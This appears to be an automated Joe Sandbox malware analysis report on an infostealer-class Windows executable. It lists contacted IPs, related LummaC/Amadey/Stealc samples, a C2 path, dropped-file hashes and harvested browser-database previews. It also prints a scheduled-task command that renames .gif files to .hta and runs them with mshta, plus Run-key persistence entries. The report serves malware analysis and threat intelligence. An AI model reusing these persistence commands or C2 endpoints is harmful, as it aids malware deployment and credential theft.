                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                                                                                                    185.199.109.133
                                                                                                                                                                                                    		unknownNetherlands
                                                                                                                                                                                                    		54113FASTLYUSfalse
                                                                                                                                                                                                    172.67.179.160
                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                    104.21.96.1
                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                    142.250.185.195
                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                                                                                                    185.215.113.206
                                                                                                                                                                                                    		unknownPortugal
                                                                                                                                                                                                    		206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                    216.58.212.174
                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                                                                                                    172.217.18.10
                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                                                                                                    142.250.184.206
                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                                                                                                    31.41.244.11
                                                                                                                                                                                                    		unknownRussian Federation
                                                                                                                                                                                                    		61974AEROEXPRESS-ASRUfalse

                                                                                                                                                                                                    Private

                                                                                                                                                                                                    IP
                                                                                                                                                                                                    192.168.2.4
                                                                                                                                                                                                    127.0.0.1

                                                                                                                                                                                                    General Information

                                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                    Analysis ID:1582701
                                                                                                                                                                                                    Start date and time:2024-12-31 09:47:01 +01:00
                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                    Overall analysis duration:0h 12m 10s
                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                    Number of analysed new started processes analysed:74
                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                    Sample name:5EfYBe3nch.exe
                                                                                                                                                                                                    renamed because original name is a hash value
                                                                                                                                                                                                    Original Sample Name:2ba2329d40af33806efdb0bbe5aeb0ad.exe
                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                    Classification:mal100.phis.troj.spyw.expl.evad.winEXE@128/103@0/23
                                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                                    • Successful, ratio: 75%
                                                                                                                                                                                                    HCA Information:Failed
                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                    • Found application associated with file extension: .exe

                                                                                                                                                                                                    Warnings

                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                                                                    • Execution Graph export aborted for target DLTDCR8UJINP8YM8Y.exe, PID 7656 because there are no executed function
                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                    • Skipping network analysis since amount of network traffic is too extensive

                                                                                                                                                                                                    Simulations

                                                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                                    03:47:56API Interceptor9x Sleep call for process: 5EfYBe3nch.exe modified
                                                                                                                                                                                                    03:48:45API Interceptor15x Sleep call for process: DLTDCR8UJINP8YM8Y.exe modified
                                                                                                                                                                                                    03:49:01API Interceptor920669x Sleep call for process: skotes.exe modified
                                                                                                                                                                                                    03:49:16API Interceptor156x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                    03:49:35API Interceptor27x Sleep call for process: eXbhgU9.exe modified
                                                                                                                                                                                                    03:49:40API Interceptor8x Sleep call for process: jyidkjkfhjawd.exe modified
                                                                                                                                                                                                    08:48:22Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                    08:49:20Task SchedulerRun new task: AutoRunHTA path: cmd.exe s>/c for %f in ("C:\Temp\*.gif") do (copy "%f" "C:\Temp\\random.hta" &amp; start mshta "C:\Temp\\random.hta")
                                                                                                                                                                                                    08:49:23AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run am.cmd C:\Users\user\AppData\Local\Temp\1026818021\am.cmd
                                                                                                                                                                                                    08:49:32AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run am.cmd C:\Users\user\AppData\Local\Temp\1026818021\am.cmd
                                                                                                                                                                                                    08:50:15AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run am.exe C:\Users\user\AppData\Local\Temp\1027024001\am.exe
                                                                                                                                                                                                    08:50:18Task SchedulerRun new task: 10DCQZI path: C:\Users\user\AppData\Local\Temp\1027002001\10DCQZI.exe
                                                                                                                                                                                                    08:50:24AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run am.exe C:\Users\user\AppData\Local\Temp\1027024001\am.exe
                                                                                                                                                                                                    08:50:32AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\10DCQZI.lnk

                                                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                                                    IPs

                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                    185.215.113.43Dl6wuWiQdg.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                                    • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                    o0cabS0OQn.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                    • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                    mDuCbT8LnH.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                    • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                    vVJvxAfBDM.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                    • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                    LIWYEYWSOj.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                    • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                    8WRONDszv4.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                                                                                                                    • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                    Idau8QuYa3.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                    • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                    oTZfvSwHTq.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                    • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                    ZBbOXn0a3R.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                    • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                    0Pm0sadcCP.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                    • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                    1.1.1.16fW0GedR6j.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 1.1.1.1/ctrl/playback.php
                                                                                                                                                                                                    PO-230821_pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                                                                                                    • www.974dp.com/sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi
                                                                                                                                                                                                    AFfv8HpACF.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 1.1.1.1/
                                                                                                                                                                                                    INVOICE_90990_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                    • www.quranvisor.com/usvr/?mN9d3vF=HHrW7cA9N4YJlebHFvlsdlDciSnnaQItEG8Ccfxp291VjnjcuwoPACt7EOqEq4SWjIf8&Pjf81=-Zdd-V5hqhM4p2S
                                                                                                                                                                                                    Go.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 1.1.1.1/

                                                                                                                                                                                                    Domains

                                                                                                                                                                                                    No context

                                                                                                                                                                                                    ASNs

                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                    CLOUDFLARENETUSzhMQ0hNEmb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                    • 104.21.112.1
                                                                                                                                                                                                    2RxMkSAgZ8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                    • 104.21.64.1
                                                                                                                                                                                                    Dl6wuWiQdg.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                                    • 104.21.112.1
                                                                                                                                                                                                    bzzF5OFbVi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                    • 104.21.64.1
                                                                                                                                                                                                    6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                    Bp4LoSXw83.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                    x6VtGfW26X.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                    • 104.21.112.1
                                                                                                                                                                                                    heteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                    • 172.67.136.42
                                                                                                                                                                                                    re5.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                    file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                    CLOUDFLARENETUSzhMQ0hNEmb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                    • 104.21.112.1
                                                                                                                                                                                                    2RxMkSAgZ8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                    • 104.21.64.1
                                                                                                                                                                                                    Dl6wuWiQdg.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                                    • 104.21.112.1
                                                                                                                                                                                                    bzzF5OFbVi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                    • 104.21.64.1
                                                                                                                                                                                                    6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                    Bp4LoSXw83.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                    x6VtGfW26X.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                    • 104.21.112.1
                                                                                                                                                                                                    heteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                    • 172.67.136.42
                                                                                                                                                                                                    re5.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                    file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                    WHOLESALECONNECTIONSNLzhMQ0hNEmb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                    • 185.215.113.16
                                                                                                                                                                                                    2RxMkSAgZ8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                    • 185.215.113.16
                                                                                                                                                                                                    Dl6wuWiQdg.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                                    • 185.215.113.16
                                                                                                                                                                                                    bzzF5OFbVi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                    • 185.215.113.16
                                                                                                                                                                                                    UmotQ1qjLq.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                    • 185.215.113.16
                                                                                                                                                                                                    l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                    • 185.215.113.16
                                                                                                                                                                                                    TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                    • 185.215.113.16
                                                                                                                                                                                                    726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                    • 185.215.113.16
                                                                                                                                                                                                    v5Evrl41VR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                    • 185.215.113.16
                                                                                                                                                                                                    8WFJ38EJo5.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                    • 185.215.113.206

                                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                                    No context

                                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                    C:\ProgramData\freebl3.dllrandom.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                      8WFJ38EJo5.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                        w22319us3M.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                          5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                                                                                                                                                                                            DRWgoZo325.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                              i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                                                                                                                                                                glpEv3POe7.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                  gYjK72gL17.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                    iUKUR1nUyD.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                      cMTqzvmx9u.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLineBrowse

                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                        C:\ProgramData\AAKKECFB

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\ProgramData\BFHIJEBKEBGHIDHJKJEGCBAEGH

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
                                                                                                                                                                                                                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):5242880
                                                                                                                                                                                                                        Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                                        MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                                        SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                                        SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                                        SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\ProgramData\DGHJEHJJDAAAKEBGCFCA

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):9571
                                                                                                                                                                                                                        Entropy (8bit):5.536643647658967
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                                                                                                                                                        MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                                                                                                                                                        SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                                                                                                                                                        SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                                                                                                                                                        SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                        C:\ProgramData\ECFHJKEBAAECBFHIECGI

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\ProgramData\HDHCFIJEGCAKJJKEHJJE

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\ProgramData\JJJEGHDA

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\ProgramData\KEGDAKEHJDHIDHJJDAECFBKFHC

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
                                                                                                                                                                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):98304
                                                                                                                                                                                                                        Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\ProgramData\freebl3.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):685392
                                                                                                                                                                                                                        Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                        MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                        SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                        SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                        SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                        • Filename: random.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: 8WFJ38EJo5.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: w22319us3M.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: 5uVReRlvME.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: DRWgoZo325.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: i8Vwc7iOaG.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: glpEv3POe7.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: gYjK72gL17.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: iUKUR1nUyD.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: cMTqzvmx9u.exe, Detection: malicious, Browse
